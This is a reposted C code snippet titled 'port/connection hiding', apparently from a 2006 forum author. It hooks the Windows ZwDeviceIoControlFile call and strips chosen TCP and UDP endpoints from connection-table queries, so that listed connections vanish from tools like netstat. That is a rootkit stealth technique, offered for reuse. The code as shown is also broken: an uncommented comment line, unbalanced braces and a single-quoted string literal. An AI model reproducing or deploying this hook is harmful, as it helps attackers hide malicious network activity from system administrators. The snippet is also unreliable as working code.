port/connection hiding

王朝c#·作者佚名 2006-12-16

宽屏版字体: 小|中|大|超大

By: akcom

typedef struct _GENERIC_RECORD

{

ULONG entry1; //state on tcp, local addr on udp

ULONG entry2; //local addr on tcp, local port on udp

ULONG entry3; //local port on tcp

ULONG entry4; //remote addr on tcp

ULONG entry5; //remote port on tcp

} GENERIC_RECORD, *PGENERIC_RECORD;

NTSTATUS

NTAPI

NewZwDeviceIoControlFile(

IN HANDLE FileHandle,

IN HANDLE Event OPTIONAL,

IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,

IN PVOID ApcContext OPTIONAL,

OUT PIO_STATUS_BLOCK IoStatusBlock,

IN ULONG IoControlCode,

IN PVOID InputBuffer OPTIONAL,

IN ULONG InputBufferLength,

OUT PVOID OutputBuffer OPTIONAL,

IN ULONG OutputBufferLength

)

{

NTSTATUS ntRes = ((ZWDICF)OldZwDeviceIoControlFile)(

FileHandle,

Event,

ApcRoutine,

ApcContext,

IoStatusBlock,

IoControlCode,

InputBuffer,

InputBufferLength,

OutputBuffer,

OutputBufferLength

);

if (!NT_SUCCESS(ntRes))

{

return ntRes;

}

if (IoControlCode != 0x120003)

{

return ntRes;

}

POBJECT_NAME_INFORMATION ObjectName;

char ObjectNameBuf[512];

ULONG ReturnLen;

ObjectName = (POBJECT_NAME_INFORMATION)ObjectNameBuf;

ObjectName->Name.MaximumLength = 500;

ZwQueryObject( FileHandle, ObjectNameInfo, ObjectName, sizeof(ObjectNameBuf), &ReturnLen );

char ObjectNameMBS[261];

wcstombs(ObjectNameMBS, ObjectName->Name.Buffer, sizeof(ObjectNameMBS));

if (stricmp(ObjectNameMBS, '\\Device\\Tcp') != 0)

{

return ntRes;

}

PBYTE input = (PBYTE)InputBuffer;

if (InputBufferLength < 17)

{

return ntRes;

}

bool tcp = false;

if its tcp, then the first item is

state, which we need to ignore

ULONG recordSize = 0;

if (input[0] == 0x00)

{

tcp = true;

recordSize = sizeof(MIB_TCPROW);

//tcp

if (input[16] == 0x02)

{

//extended

recordSize += 4;

}

else

{

//udp

recordSize = sizeof(MIB_UDPROW);

//extended

if (input[16] == 0x02)

{

recordSize += 4;

}

ULONG entryCount = IoStatusBlock->Information / recordSize;

bool done;

PGENERIC_RECORD data = (PGENERIC_RECORD)OutputBuffer;

ULONG i;

ULONG ip;

USHORT port;

i = 0;

while (i < entryCount)

{

ip = tcp ? data->entry2 : data->entry1;

port = (USHORT)(tcp ? data->entry3 : data->entry2);

// i use a linked list of records to hide,

// just replace this with your comparison

if (

matchesConMask( ip, port, g_ConList )

)

{

//local stuff

hideEndPoint( (PGENERIC_RECORD)OutputBuffer, entryCount, i, recordSize );

IoStatusBlock->Information -= recordSize;

entryCount--;

}

else

// i use a linked list of records to hide,

// just replace this with your comparison

if (tcp && matchesConMask( data->entry4, (USHORT)data->entry5, g_ConList ) )

{

//remote stuff

hideEndPoint( (PGENERIC_RECORD)OutputBuffer, entryCount, i, recordSize );

IoStatusBlock->Information -= recordSize;

entryCount--;

}

else

{

data = (PGENERIC_RECORD)(((char *)data) + recordSize);

i++;

}

return ntRes;

}